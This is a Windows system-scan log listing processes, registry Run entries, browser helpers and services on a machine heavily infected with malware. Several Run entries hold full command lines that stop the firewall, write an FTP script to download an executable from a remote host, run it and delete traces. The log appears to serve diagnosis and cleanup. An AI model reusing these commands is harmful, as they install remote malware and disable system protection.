Program Analysis

Code : Xwnx4MNhi20ODqm0RGLXfFFiRQ6M3x4NE0wCNZoM+ItTVzqcR5NW2g==

Process Heaven 2013. 7. 8. 10:24

[00-PROCESS]**AdobeARM -/- C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
[00-PROCESS]**AvastSvc -/- C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
[00-PROCESS]**CDASrv -/- C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
[00-PROCESS]**cz -/- C:\WINDOWS\ime\cz.exe
[00-PROCESS]**GrooveAuditService -/- C:\Program Files\Microsoft Office\Office12\GrooveAuditService.exe
[00-PROCESS]**GrooveMonitor -/- C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
[00-PROCESS]**HPWuSchd2 -/- C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
[00-PROCESS]**iexplore -/- C:\Program Files\Internet Explorer\iexplore.exe
[00-PROCESS]**jusched -/- C:\Program Files\Common Files\Java\Java Update\jusched.exe
[00-PROCESS]**MDM -/- C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
[00-PROCESS]**MonServiceUDisk -/- C:\Program Files\MBlaze UI\bin\MonServiceUDisk.exe
[00-PROCESS]**msmsgs -/- C:\Program Files\Messenger\msmsgs.exe
[00-PROCESS]**NeroCheck -/- C:\WINDOWS\system32\NeroCheck.exe
[00-PROCESS]**NokiaMServer -/- C:\Program Files\Common Files\Nokia\MPlatform\NokiaMServer.exe
[00-PROCESS]**ntvdm -/- C:\WINDOWS\system32\ntvdm.exe
[00-PROCESS]**nvsvc32 -/- C:\WINDOWS\system32\nvsvc32.exe
[00-PROCESS]**ODSERV -/- C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE
[00-PROCESS]**OSE -/- C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
[00-PROCESS]**Rriqqhw -/- C:\Program Files\Rurduy quqqn\Rriqqhw.exe
[00-PROCESS]**RTHDCPL -/- C:\WINDOWS\RTHDCPL.EXE
[00-PROCESS]**RUNDLL32 -/- C:\WINDOWS\system32\RUNDLL32.EXE
[00-PROCESS]**SMSvcHost -/- C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
[00-PROCESS]**spupdsvc -/- C:\WINDOWS\system32\spupdsvc.exe
[00-PROCESS]**sqlagent -/- C:\MSSQL7\binn\sqlagent.exe
[00-PROCESS]**sqlmangr -/- C:\MSSQL7\Binn\sqlmangr.exe
[00-PROCESS]**sqlservr -/- C:\MSSQL7\binn\sqlservr.exe
[00-PROCESS]**Squaaoq -/- C:\Program Files\Rukmqu mdfbf\Squaaoq.exe
[00-PROCESS]**svchest -/- C:\WINDOWS\TEMP\svchest.exe
[00-PROCESS]**Tata Photon+ -/- C:\Program Files\Tata Photon+\Huawei\Tata Photon+.exe
[00-PROCESS]**TeamViewer -/- C:\Program Files\TeamViewer\Version7\TeamViewer.exe
[00-PROCESS]**TeamViewer_Desktop -/- c:\program files\teamviewer\version7\TeamViewer_Desktop.exe
[00-PROCESS]**tv_w32 -/- C:\Program Files\TeamViewer\Version7\tv_w32.exe
[00-PROCESS]**WJNews -/- C:\Program Files\Wuji\2013422\WJNews.exe
[00-PROCESS]**woai -/- C:\RECYCLER\woai.exe
[01-HKCUREG]** QQPCTray -/-
[01-HKCUREG]**360anfgg -/- C:\WINDOWS\java\hfs.exe
[01-HKCUREG]**360ank -/- C:\WINDOWS\Temp\wind.exe
[01-HKCUREG]**360anq5uan -/- C:\WINDOWS\Web\xggb.exe
[01-HKCUREG]**360anquan -/- C:\WINDOWS\system32\oobe\msobshel.exe
[01-HKCUREG]**360dfd -/- C:\WINDOWS\Temp\wind.exe
[01-HKCUREG]**360dffg -/- C:\WINDOWS\ime\cz.exe
[01-HKCUREG]**360dfg -/- C:\WINDOWS\ime\cz.exe
[01-HKCUREG]**360erd -/- C:\WINDOWS\Help\360zdf.exe
[01-HKCUREG]**360fghv -/- C:\WINDOWS\Web\wind.exe
[01-HKCUREG]**360fv -/- C:\WINDOWS\inf\360qa.exe
[01-HKCUREG]**360fy5zd -/- C:\WINDOWS\Web\xggb.exe
[01-HKCUREG]**360fyjhk -/- C:\WINDOWS\Temp\wind.exe
[01-HKCUREG]**360fyzd -/- C:\WINDOWS\system32\oobe\msobshel.exe
[01-HKCUREG]**360ggf -/- C:\WINDOWS\web\winxx.vbs
[01-HKCUREG]**360ghgh -/- C:\WINDOWS\Help\360nnd.exe
[01-HKCUREG]**360nnt -/- C:\WINDOWS\web\setup_open_2096.exe
[01-HKCUREG]**360onj -/- C:\WINDOWS\web\kuping_s_31088.exe
[01-HKCUREG]**360qm -/- C:\WINDOWS\inf\360qa.exe
[01-HKCUREG]**360safe -/- cmd /c net1 stop sharedaccess&echo open cie.s.3322.net  > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1433pp.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&1433pp.exe&del cmd.txt /q /f&del 1433pp.exe /q /f&exit
[01-HKCUREG]**360Safetray -/-
[01-HKCUREG]**360ss -/- C:\WINDOWS\Help\360zdf.exe
[01-HKCUREG]**360tye -/- C:\WINDOWS\Help\360nnd.exe
[01-HKCUREG]**360xxb -/- C:\WINDOWS\web\setup_open_2096.exe
[01-HKCUREG]**360xxd -/- C:\WINDOWS\web\ksbinstaller_s_66_53586.exe
[01-HKCUREG]**360xxm -/- C:\WINDOWS\web\kuping_s_31088.exe
[01-HKCUREG]**Adobe ARM -/- C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
[01-HKCUREG]**Ahnsdsv -/-
[01-HKCUREG]**Alcmtr -/- ALCMTR.EXE
[01-HKCUREG]**almon -/-
[01-HKCUREG]**APASSeru -/-
[01-HKCUREG]**Arcavir -/-
[01-HKCUREG]**ashDisp -/-
[01-HKCUREG]**Ashll -/- c:\windows\system32\dllcache\cmd.exe /c @echo open fm5566.publicvm.com>>cmd.txt&echo 123>>cmd.txt&echo xxx>>cmd.txt&echo get Whao.exe>> cmd.txt&echo bye>>cmd.txt&ftp -s:cmd.txt&Whao.exe&Whao.exe&del cmd.txt /q
[01-HKCUREG]**Authentium -/-
[01-HKCUREG]**authfw -/-
[01-HKCUREG]**avcenter -/-
[01-HKCUREG]**AVG -/-
[01-HKCUREG]**avgnt -/- C:\Program Files\Avira\AntiVir Desktop\avgnt.exe /min
[01-HKCUREG]**avire -/-
[01-HKCUREG]**avp -/-
[01-HKCUREG]**baidu -/- C:\WINDOWS\Web\chinaad.exe
[01-HKCUREG]**baidu1 -/- C:\WINDOWS\Web\union.exe
[01-HKCUREG]**baidu526 -/- C:\WINDOWS\Web\ksbinstaller_s_66_53586.exe
[01-HKCUREG]**baidu56 -/- C:\WINDOWS\Web\KAVSETUP_66_9862.exe
[01-HKCUREG]**baidu561 -/- C:\WINDOWS\Web\win.exe
[01-HKCUREG]**baidu56g -/- C:\WINDOWS\web\ksbinstaller_s_66_53586.exe
[01-HKCUREG]**baidu56ggf -/- C:\WINDOWS\addins\ksbinstaller_s_92_1.exe
[01-HKCUREG]**baidu56ggfd -/- C:\WINDOWS\ime\windo.exe
[01-HKCUREG]**baidu56ggfh -/- C:\WINDOWS\addins\NSSAD_66_1.exe
[01-HKCUREG]**baidu56jh -/- C:\WINDOWS\Web\window.exe
[01-HKCUREG]**baidu5u6g -/- C:\WINDOWS\web\setup_open_2096.exe
[01-HKCUREG]**baidu5u6gff -/- C:\WINDOWS\web\setup_open_3088.exe
[01-HKCUREG]**baidu5u6gffk -/- C:\WINDOWS\web\21101_lfylstp.exe
[01-HKCUREG]**BitDefender -/-
[01-HKCUREG]**bixushi -/- c:\windows\system32\csx.exe
[01-HKCUREG]**BoxNews_201372 -/- C:\Program Files\MusicPlayer\201372\BoxNews.exe -mini
[01-HKCUREG]**cao -/- c:\windows\system32\wbem\osinter.exe
[01-HKCUREG]**CDAServer -/- C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
[01-HKCUREG]**cfp -/-
[01-HKCUREG]**ClamAC -/-
[01-HKCUREG]**Comode -/-
[01-HKCUREG]**ctfmon.exe -/- C:\WINDOWS\system32\ctfmon.exe
[01-HKCUREG]**DR -/-
[01-HKCUREG]**dsa -/- C:\RECYCLER\woai.exe
[01-HKCUREG]**fasd -/- C:\RECYCLER\woai.exe
[01-HKCUREG]**fd2s -/- C:\WINDOWS\ime\cv.exe
[01-HKCUREG]**fd2sds -/- C:\WINDOWS\ime\taskmgr.exe
[01-HKCUREG]**fomon  -/-
[01-HKCUREG]**fsd32 -/- C:\WINDOWS\ime\cv.exe
[01-HKCUREG]**fsd3sw2 -/- C:\WINDOWS\ime\taskmgr.exe
[01-HKCUREG]**F-Secure -/-
[01-HKCUREG]**fssm32 -/-
[01-HKCUREG]**fstnod32 -/- c:\windows\addins\net.exe
[01-HKCUREG]**gent -/-
[01-HKCUREG]**ghdddhx -/- C:\WINDOWS\ime\cz.exe
[01-HKCUREG]**ghhx -/- C:\WINDOWS\ime\cv.exe
[01-HKCUREG]**GrooveMonitor -/- C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
[01-HKCUREG]**guaedxservice -/-
[01-HKCUREG]**HARDWARE -/-
[01-HKCUREG]**HP Software Update -/- C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
[01-HKCUREG]**Ikaeus -/-
[01-HKCUREG]**jhbc -/- C:\WINDOWS\ime\cv.exe
[01-HKCUREG]**jhbddc -/- C:\WINDOWS\ime\cz.exe
[01-HKCUREG]**kstnod32 -/- c:\windows\system32\csx.exe
[01-HKCUREG]**KVMON -/-
[01-HKCUREG]**KVXP -/-
[01-HKCUREG]**kxesc -/-
[01-HKCUREG]**kxetray -/-
[01-HKCUREG]**mcafee -/-
[01-HKCUREG]**McAfeeUpdaterUI -/-
[01-HKCUREG]**MHz -/-
[01-HKCUREG]**MSMSGS -/- C:\Program Files\Messenger\msmsgs.exe /background
[01-HKCUREG]**msseces -/-
[01-HKCUREG]**MusicPlayer_201372 -/- C:\Program Files\MusicPlayer\201372\MusicPlayer.exe -mini
[01-HKCUREG]**Navapsvc -/-
[01-HKCUREG]**NeroFilterCheck -/- C:\WINDOWS\system32\NeroCheck.exe
[01-HKCUREG]**NokiaMServer -/- C:\Program Files\Common Files\Nokia\MPlatform\NokiaMServer /watchfiles startup
[01-HKCUREG]**Norman -/-
[01-HKCUREG]**NvCplDaemon -/- RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dllNvStartup
[01-HKCUREG]**nvcsshed -/-
[01-HKCUREG]**NvMediaCenter -/- RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dllNvTaskbarInit
[01-HKCUREG]**nwiz -/- nwiz.exe /install
[01-HKCUREG]**pavfires -/-
[01-HKCUREG]**QQPCTray -/-
[01-HKCUREG]**RavMonD -/-
[01-HKCUREG]**RavTRAY -/-
[01-HKCUREG]**RISTRAY -/-
[01-HKCUREG]**RTHDCPL -/- RTHDCPL.EXE
[01-HKCUREG]**sched -/-
[01-HKCUREG]**sd -/- C:\RECYCLER\smss.exe
[01-HKCUREG]**SeekHack -/- c:\windows\system32\cmd.exe /c net1 stop sharedaccess&Title À¬»øÇåÀí&mode con cols=24 lines=2&echo open attack.5166.info > seek.hack&echo sql>> seek.hack&echo sql>> seek.hack&echo binary >> seek.hack&echo get Nod32.exe>> seek.hack&echo bye >> seek.hack&ft
[01-HKCUREG]**shabi -/- c:\windows\addins\net.exe
[01-HKCUREG]**shell -/- C:\windows\toolset.exe
[01-HKCUREG]**shell1 -/- c:\windows\system\windowsupdato.bat
[01-HKCUREG]**ShStatEXE -/-
[01-HKCUREG]**SohuVA -/- C:\Program Files\????\SHPlayer.exe /auto
[01-HKCUREG]**sophos -/-
[01-HKCUREG]**SPIDer -/-
[01-HKCUREG]**Sunbelt -/-
[01-HKCUREG]**SunJavaUpdateSched -/- C:\Program Files\Common Files\Java\Java Update\jusched.exe
[01-HKCUREG]**TMBMSRV -/-
[01-HKCUREG]**VeohPlugin -/- C:\Program Files\Veoh Networks\VeohWebPlayer\veohwebplayer.exe
[01-HKCUREG]**vsserv -/-
[01-HKCUREG]**WEB -/-
[01-HKCUREG]**WJNews_2013422 -/- C:\Program Files\Wuji\2013422\WJNews.exe -mini
[01-HKCUREG]**xue -/- C:\RECYCLER\csrss.exe
[01-HKCUREG]**xuego1u -/- C:\WINDOWS\Web\xggb.exe
[01-HKCUREG]**xuegou -/- C:\WINDOWS\Help\360zdf.exe
[01-HKCUREG]**yige -/- c:\windows\system32\wbem\explore.exe
[01-HKCUREG]**zhouhongyi -/- c:\windows\java\net1.exe
[02-HKLMREG]** QQPCTray -/-
[02-HKLMREG]**360anfgg -/- C:\WINDOWS\java\hfs.exe
[02-HKLMREG]**360ank -/- C:\WINDOWS\Temp\wind.exe
[02-HKLMREG]**360anq5uan -/- C:\WINDOWS\Web\xggb.exe
[02-HKLMREG]**360anquan -/- C:\WINDOWS\system32\oobe\msobshel.exe
[02-HKLMREG]**360dfd -/- C:\WINDOWS\Temp\wind.exe
[02-HKLMREG]**360dffg -/- C:\WINDOWS\ime\cz.exe
[02-HKLMREG]**360dfg -/- C:\WINDOWS\ime\cz.exe
[02-HKLMREG]**360erd -/- C:\WINDOWS\Help\360zdf.exe
[02-HKLMREG]**360fghv -/- C:\WINDOWS\Web\wind.exe
[02-HKLMREG]**360fv -/- C:\WINDOWS\inf\360qa.exe
[02-HKLMREG]**360fy5zd -/- C:\WINDOWS\Web\xggb.exe
[02-HKLMREG]**360fyjhk -/- C:\WINDOWS\Temp\wind.exe
[02-HKLMREG]**360fyzd -/- C:\WINDOWS\system32\oobe\msobshel.exe
[02-HKLMREG]**360ggf -/- C:\WINDOWS\web\winxx.vbs
[02-HKLMREG]**360ghgh -/- C:\WINDOWS\Help\360nnd.exe
[02-HKLMREG]**360nnt -/- C:\WINDOWS\web\setup_open_2096.exe
[02-HKLMREG]**360onj -/- C:\WINDOWS\web\kuping_s_31088.exe
[02-HKLMREG]**360qm -/- C:\WINDOWS\inf\360qa.exe
[02-HKLMREG]**360safe -/- cmd /c net1 stop sharedaccess&echo open cie.s.3322.net  > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1433pp.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&1433pp.exe&del cmd.txt /q /f&del 1433pp.exe /q /f&exit
[02-HKLMREG]**360Safetray -/-
[02-HKLMREG]**360ss -/- C:\WINDOWS\Help\360zdf.exe
[02-HKLMREG]**360tye -/- C:\WINDOWS\Help\360nnd.exe
[02-HKLMREG]**360xxb -/- C:\WINDOWS\web\setup_open_2096.exe
[02-HKLMREG]**360xxd -/- C:\WINDOWS\web\ksbinstaller_s_66_53586.exe
[02-HKLMREG]**360xxm -/- C:\WINDOWS\web\kuping_s_31088.exe
[02-HKLMREG]**Adobe ARM -/- C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
[02-HKLMREG]**Ahnsdsv -/-
[02-HKLMREG]**Alcmtr -/- ALCMTR.EXE
[02-HKLMREG]**almon -/-
[02-HKLMREG]**APASSeru -/-
[02-HKLMREG]**Arcavir -/-
[02-HKLMREG]**ashDisp -/-
[02-HKLMREG]**Ashll -/- c:\windows\system32\dllcache\cmd.exe /c @echo open fm5566.publicvm.com>>cmd.txt&echo 123>>cmd.txt&echo xxx>>cmd.txt&echo get Whao.exe>> cmd.txt&echo bye>>cmd.txt&ftp -s:cmd.txt&Whao.exe&Whao.exe&del cmd.txt /q
[02-HKLMREG]**Authentium -/-
[02-HKLMREG]**authfw -/-
[02-HKLMREG]**avcenter -/-
[02-HKLMREG]**AVG -/-
[02-HKLMREG]**avgnt -/- C:\Program Files\Avira\AntiVir Desktop\avgnt.exe /min
[02-HKLMREG]**avire -/-
[02-HKLMREG]**avp -/-
[02-HKLMREG]**baidu -/- C:\WINDOWS\Web\chinaad.exe
[02-HKLMREG]**baidu1 -/- C:\WINDOWS\Web\union.exe
[02-HKLMREG]**baidu526 -/- C:\WINDOWS\Web\ksbinstaller_s_66_53586.exe
[02-HKLMREG]**baidu56 -/- C:\WINDOWS\Web\KAVSETUP_66_9862.exe
[02-HKLMREG]**baidu561 -/- C:\WINDOWS\Web\win.exe
[02-HKLMREG]**baidu56g -/- C:\WINDOWS\web\ksbinstaller_s_66_53586.exe
[02-HKLMREG]**baidu56ggf -/- C:\WINDOWS\addins\ksbinstaller_s_92_1.exe
[02-HKLMREG]**baidu56ggfd -/- C:\WINDOWS\ime\windo.exe
[02-HKLMREG]**baidu56ggfh -/- C:\WINDOWS\addins\NSSAD_66_1.exe
[02-HKLMREG]**baidu56jh -/- C:\WINDOWS\Web\window.exe
[02-HKLMREG]**baidu5u6g -/- C:\WINDOWS\web\setup_open_2096.exe
[02-HKLMREG]**baidu5u6gff -/- C:\WINDOWS\web\setup_open_3088.exe
[02-HKLMREG]**baidu5u6gffk -/- C:\WINDOWS\web\21101_lfylstp.exe
[02-HKLMREG]**BitDefender -/-
[02-HKLMREG]**bixushi -/- c:\windows\system32\csx.exe
[02-HKLMREG]**BoxNews_201372 -/- C:\Program Files\MusicPlayer\201372\BoxNews.exe -mini
[02-HKLMREG]**cao -/- c:\windows\system32\wbem\osinter.exe
[02-HKLMREG]**CDAServer -/- C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
[02-HKLMREG]**cfp -/-
[02-HKLMREG]**ClamAC -/-
[02-HKLMREG]**Comode -/-
[02-HKLMREG]**ctfmon.exe -/- C:\WINDOWS\system32\ctfmon.exe
[02-HKLMREG]**DR -/-
[02-HKLMREG]**dsa -/- C:\RECYCLER\woai.exe
[02-HKLMREG]**fasd -/- C:\RECYCLER\woai.exe
[02-HKLMREG]**fd2s -/- C:\WINDOWS\ime\cv.exe
[02-HKLMREG]**fd2sds -/- C:\WINDOWS\ime\taskmgr.exe
[02-HKLMREG]**fomon  -/-
[02-HKLMREG]**fsd32 -/- C:\WINDOWS\ime\cv.exe
[02-HKLMREG]**fsd3sw2 -/- C:\WINDOWS\ime\taskmgr.exe
[02-HKLMREG]**F-Secure -/-
[02-HKLMREG]**fssm32 -/-
[02-HKLMREG]**fstnod32 -/- c:\windows\addins\net.exe
[02-HKLMREG]**gent -/-
[02-HKLMREG]**ghdddhx -/- C:\WINDOWS\ime\cz.exe
[02-HKLMREG]**ghhx -/- C:\WINDOWS\ime\cv.exe
[02-HKLMREG]**GrooveMonitor -/- C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
[02-HKLMREG]**guaedxservice -/-
[02-HKLMREG]**HARDWARE -/-
[02-HKLMREG]**HP Software Update -/- C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
[02-HKLMREG]**Ikaeus -/-
[02-HKLMREG]**jhbc -/- C:\WINDOWS\ime\cv.exe
[02-HKLMREG]**jhbddc -/- C:\WINDOWS\ime\cz.exe
[02-HKLMREG]**kstnod32 -/- c:\windows\system32\csx.exe
[02-HKLMREG]**KVMON -/-
[02-HKLMREG]**KVXP -/-
[02-HKLMREG]**kxesc -/-
[02-HKLMREG]**kxetray -/-
[02-HKLMREG]**mcafee -/-
[02-HKLMREG]**McAfeeUpdaterUI -/-
[02-HKLMREG]**MHz -/-
[02-HKLMREG]**MSMSGS -/- C:\Program Files\Messenger\msmsgs.exe /background
[02-HKLMREG]**msseces -/-
[02-HKLMREG]**MusicPlayer_201372 -/- C:\Program Files\MusicPlayer\201372\MusicPlayer.exe -mini
[02-HKLMREG]**Navapsvc -/-
[02-HKLMREG]**NeroFilterCheck -/- C:\WINDOWS\system32\NeroCheck.exe
[02-HKLMREG]**NokiaMServer -/- C:\Program Files\Common Files\Nokia\MPlatform\NokiaMServer /watchfiles startup
[02-HKLMREG]**Norman -/-
[02-HKLMREG]**NvCplDaemon -/- RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dllNvStartup
[02-HKLMREG]**nvcsshed -/-
[02-HKLMREG]**NvMediaCenter -/- RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dllNvTaskbarInit
[02-HKLMREG]**nwiz -/- nwiz.exe /install
[02-HKLMREG]**pavfires -/-
[02-HKLMREG]**QQPCTray -/-
[02-HKLMREG]**RavMonD -/-
[02-HKLMREG]**RavTRAY -/-
[02-HKLMREG]**RISTRAY -/-
[02-HKLMREG]**RTHDCPL -/- RTHDCPL.EXE
[02-HKLMREG]**sched -/-
[02-HKLMREG]**sd -/- C:\RECYCLER\smss.exe
[02-HKLMREG]**SeekHack -/- c:\windows\system32\cmd.exe /c net1 stop sharedaccess&Title À¬»øÇåÀí&mode con cols=24 lines=2&echo open attack.5166.info > seek.hack&echo sql>> seek.hack&echo sql>> seek.hack&echo binary >> seek.hack&echo get Nod32.exe>> seek.hack&echo bye >> seek.hack&ft
[02-HKLMREG]**shabi -/- c:\windows\addins\net.exe
[02-HKLMREG]**shell -/- C:\windows\toolset.exe
[02-HKLMREG]**shell1 -/- c:\windows\system\windowsupdato.bat
[02-HKLMREG]**ShStatEXE -/-
[02-HKLMREG]**SohuVA -/- C:\Program Files\????\SHPlayer.exe /auto
[02-HKLMREG]**sophos -/-
[02-HKLMREG]**SPIDer -/-
[02-HKLMREG]**Sunbelt -/-
[02-HKLMREG]**SunJavaUpdateSched -/- C:\Program Files\Common Files\Java\Java Update\jusched.exe
[02-HKLMREG]**TMBMSRV -/-
[02-HKLMREG]**VeohPlugin -/- C:\Program Files\Veoh Networks\VeohWebPlayer\veohwebplayer.exe
[02-HKLMREG]**vsserv -/-
[02-HKLMREG]**WEB -/-
[02-HKLMREG]**WJNews_2013422 -/- C:\Program Files\Wuji\2013422\WJNews.exe -mini
[02-HKLMREG]**xue -/- C:\RECYCLER\csrss.exe
[02-HKLMREG]**xuego1u -/- C:\WINDOWS\Web\xggb.exe
[02-HKLMREG]**xuegou -/- C:\WINDOWS\Help\360zdf.exe
[02-HKLMREG]**yige -/- c:\windows\system32\wbem\explore.exe
[02-HKLMREG]**zhouhongyi -/- c:\windows\java\net1.exe
[03-BHOCLSD]**avast! WebRep -/- C:\Program Files\Alwil Software\Avast5\aswWebRepIE.dll -/- {8E5E2654-AD2D-48bf-AC2D-D17F00898D06}
[03-BHOCLSD]**CSohuDetector Object -/- C:\Program Files\搜狐影音\SoHuAutoDetector.dll -/- {452ADB5B-00BE-469D-A65F-3046146B2ED5}
[03-BHOCLSD]**Groove GFS Browser Helper -/- C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll -/- {72853161-30C5-4D22-B7F9-0BBC1D38A37E}
[03-BHOCLSD]**Java(tm) Plug-In 2 SSV Helper -/- C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\jp2ssv.dll -/- {DBC80044-A445-435b-BC74-9C25C1C588A9}
[03-BHOCLSD]**Java(tm) Plug-In SSV Helper -/- C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\ssv.dll -/- {761497BB-D6F0-462C-B6EB-D4DAF1D92D43}
[04-TOOLBAR]**avast! WebRep -/- C:\Program Files\Alwil Software\Avast5\aswWebRepIE.dll -/- {8E5E2654-AD2D-48bf-AC2D-D17F00898D06}
[04-TOOLBAR]**N.A -/- N.A -/- 10
[04-TOOLBAR]**Veoh Video Compass -/- C:\Program Files\Veoh Networks\Veoh Video Compass\SearchRecsPlugin.dll -/- {52836EB0-631A-47B1-94A6-61F9D9112DAE}
[05-SERVICE]**123 -/- 123456 -/- C:\WINDOWS\System32\svchost.exe -/- C:\WINDOWS\system32\RbmothC.dll
[05-SERVICE]**avast! Antivirus -/- avast! Antivirus -/- C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
[05-SERVICE]**Cirdiy makoma -/- Usmwcs ygkeaoeu -/- C:\Program Files\Rukmqu mdfbf\Squaaoq.exe
[05-SERVICE]**clr_optimization_v2.0.50727_86 -/- Microsoft .NET Framework NGEN v2.0.50727_X32 -/- Rundll32.exe C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.Data.Sql.dllstart
[05-SERVICE]**Czrwsc oaqmoa -/- Gioeyi cuqwamwg -/- C:\WINDOWS\Kingsoft.com
[05-SERVICE]**GamingWonderlandService -/- GamingWonderlandService -/- C:\PROGRA~1\GAMING~2\bar\1.bin\gtbarsvc.exe
[05-SERVICE]**HWDeviceService.exe -/- HWDeviceService.exe -/- C:\Documents and Settings\Administrator\Application Data\DatacardService\HWDeviceService.exe -/service
[05-SERVICE]**Igmdfa warfta -/- Qtmpis udscaspp -/- C:\Program Files\Rukmqu mdfbf\Squaaoq.exe
[05-SERVICE]**Iqxpgs waoewa -/- Cuwkiu syoqaeqc -/- C:\Program Files\Rukmqu mdfbf\Squaaoq.exe
[05-SERVICE]**Irmon -/- Infrared Monitor -/- C:\WINDOWS\system32\svchost.exe -/- C:\WINDOWS\System32\irmon.dll
[05-SERVICE]**JavaQuickStarterService -/- Java Quick Starter -/- C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\jqs.exe -service -config C:\Program Files\Oracle\JavaFX 2.1 Runtime\lib\deploy\jqs\jqs.conf
[05-SERVICE]**MDM -/- Machine Debug Manager -/- C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
[05-SERVICE]**MediabCentero -/- MS Median Controlm Centerx -/- C:\WINDOWS\System32\svchost.exe -/- C:\WINDOWS\system32\RimntcC.cc3
[05-SERVICE]**MediaqCenterl -/- MS Mediad Controlc Centere -/- \RjqjzJ .exe
[05-SERVICE]**Microsoft Office Groove Audit Service -/- Microsoft Office Groove Audit Service -/- C:\Program Files\Microsoft Office\Office12\GrooveAuditService.exe
[05-SERVICE]**Microsoft Updatemgt.exe -/- Microsoft Updateloy Software is private services -/- C:\Program Files\Internet Explorer\nfnujf.exe
[05-SERVICE]**Microsoft Updateokd.exe -/- Microsoft Updatebga Software is private services -/- C:\Program Files\Internet Explorer\gdutcl.exe
[05-SERVICE]**MozillaMaintenance -/- Mozilla Maintenance Service -/- C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
[05-SERVICE]**Mrdues uaysga -/- Krsgog ixwcauck -/- C:\Program Files\Rukmqu mdfbf\Squaaoq.exe
[05-SERVICE]**MSSQLServer -/- MSSQLServer -/- C:\MSSQL7\binn\sqlservr.exe
[05-SERVICE]**msupdate -/- Microsoft security update service -/- c:\windows\system32\mssrv32.exe
[05-SERVICE]**MSUpdqtebjf -/- Microsoft Windows Uqdatentr Service -/- C:\Program Files\saeiac.exe
[05-SERVICE]**MSUpdqtecko -/- Microsoft Windows Uqdateewi Service -/- C:\Program Files\sakuwk.exe
[05-SERVICE]**MSUpdqtehrd -/- Microsoft Windows Uqdatedah Service -/- C:\Program Files\ssigss.exe
[05-SERVICE]**MSUpdqtelqf -/- Microsoft Windows Uqdatejwx Service -/- C:\Program Files\xsplsy.exe
[05-SERVICE]**MSUpdqterui -/- Microsoft Windows Uqdatewua Service -/- C:\Program Files\kokaoo.exe
[05-SERVICE]**MSUpdqtesqi -/- Microsoft Windows Uqdatejtk Service -/- C:\Program Files\qoyiki.exe
[05-SERVICE]**Natiaonal Safe Meadi -/- Natiaonal Safe Meadi Service -/- C:\WINDOWS\TEMP\\svchest.exe
[05-SERVICE]**Nationaljgr -/- Nationalhhf Instruments Domain Service -/- C:\Documents and Settings\UserData.exe
[05-SERVICE]**netscvre -/- NT LM Security Support Providers -/- C:\WINDOWS\system32\oysmqo.exe
[05-SERVICE]**NVSvc -/- NVIDIA Display Driver Service -/- C:\WINDOWS\system32\nvsvc32.exe
[05-SERVICE]**Ocgqrc uaziaa -/- Ukmfnu wgwumunb -/- C:\Program Files\Rukmqu mdfbf\Squaaoq.exe
[05-SERVICE]**odserv -/- Microsoft Office Diagnostics Service -/- C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE
[05-SERVICE]**ose -/- Office Source Engine -/- C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
[05-SERVICE]**qiliycdj -/- qiliycdj -/- C:\WINDOWS\qiliycdj.LOG
[05-SERVICE]**QWWAkwfQ -/- jGgWvv KVQhTpMsI -/- C:\WINDOWS\system32\i8013\F001.exe
[05-SERVICE]**Qwybbo qazlna -/- Gtgruw inaaaynf -/- C:\Program Files\Rurduy quqqn\Rriqqhw.exe
[05-SERVICE]**Reliance Netconnect. RunOuc -/- Reliance Netconnect. OUC -/- C:\Program Files\Reliance Netconnect+\UpdateDog\ouc.exe
[05-SERVICE]**rfUanvrm -/- SuElKo tJoxiimmm -/- C:\WINDOWS\system32\i8013\D001.exe
[05-SERVICE]**ServiceLayer -/- ServiceLayer -/- C:\Program Files\Nokia\PC Connectivity Solution\ServiceLayer.exe
[05-SERVICE]**SPOOLSVC -/- SPOOLSVC -/- C:\Program Files\Common Files\System\sdb.exe
[05-SERVICE]**spupdsvc -/- Windows Service Pack Installer update service -/- C:\WINDOWS\system32\spupdsvc.exe
[05-SERVICE]**SQLServerAgent -/- SQLServerAgent -/- C:\MSSQL7\binn\sqlagent.exe
[05-SERVICE]**Szqwsi cawkqa -/- Ldqmys ygkeaoeu -/- C:\Program Files\Rurduy quqqn\Rriqqhw.exe
[05-SERVICE]**UDisk Monitor -/- UDisk Monitor -/- C:\Program Files\MBlaze UI\bin\MonServiceUDisk.exe
[05-SERVICE]**Ukylrc gacrda -/- Gsqodv iwqaxyhb -/- C:\Program Files\Rurduy quqqn\Rriqqhw.exe
